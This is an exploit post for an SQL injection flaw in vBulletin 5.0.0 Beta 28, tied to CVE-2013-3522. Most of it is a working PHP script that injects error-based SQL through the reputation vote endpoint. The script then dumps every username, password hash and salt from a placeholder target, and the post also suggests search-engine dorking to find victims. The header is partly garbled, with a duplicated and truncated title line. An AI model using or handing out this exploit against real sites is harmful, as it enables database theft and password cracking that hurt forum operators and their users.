vBulletin 5.0.0 Beta 28 SQL Injection

=============================================================================================================================================
| # Title : vBulletin 5.0.0 =============================================================================================================================================
| # Title : vBulletin 5.0.0 Beta 28 SQL Injection vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.vbulletin.com/ |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description: SQL Injection Vulnerability in vBulletin 5 Extracts Usernames and Encrypted Data

(Related : https://packetstorm.news/files/id/180631/ Linked CVE numbers: CVE-2013-3522 ) .

[+] save code as poc.php.

[+] Set target : line 70

[+] PayLoad :

<?php

class VBulletinSQLiExploit {
private $target;
private $minNode;
private $maxNode;

public function __construct($target, $minNode = 1, $maxNode = 100) {
$this->target = rtrim($target, '/');
$this->minNode = $minNode;
$this->maxNode = $maxNode;
}

private function sendRequest($data) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$this->target/index.php/ajax/api/reputation/vote");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
return $response;
}

private function doSQLi($node, $query) {
$mark = bin2hex(random_bytes(4));
$injection = ") AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT CONCAT('$mark', ($query), '$mark') FROM information_schema.tables LIMIT 1), FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x) a) -- ";

$data = ['nodeid' => "$node$injection"];
$res = $this->sendRequest($data);

if (strpos($res, "Database error in vBulletin") !== false && preg_match("/$mark(.*?)$mark/", $res, $matches)) {
return $matches[1];
}
return null;
}

private function existsNode($id) {
return $this->doSQLi($id, "SELECT '1'") !== null;
}

private function findValidNode() {
for ($i = $this->minNode; $i <= $this->maxNode; $i++) {
if ($this->existsNode($i)) return $i;
}
return null;
}

public function exploit() {
echo "[+] Searching for a valid node...\n";
$node = $this->findValidNode();
if (!$node) {
echo "[-] No valid node found.\n";
return;
}
echo "[+] Using Node ID: $node\n";

$userCount = $this->doSQLi($node, "SELECT COUNT(*) FROM user");
echo "[+] Found $userCount users.\n";

for ($i = 0; $i < $userCount; $i++) {
$username = $this->doSQLi($node, "SELECT username FROM user LIMIT $i,1");
$password = $this->doSQLi($node, "SELECT password FROM user LIMIT $i,1");
$salt = $this->doSQLi($node, "SELECT salt FROM user LIMIT $i,1");
echo "[*] User: $username | Hash: $password | Salt: $salt\n";
}
}
}

$exploit = new VBulletinSQLiExploit("http://target.com");
$exploit->exploit();





Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================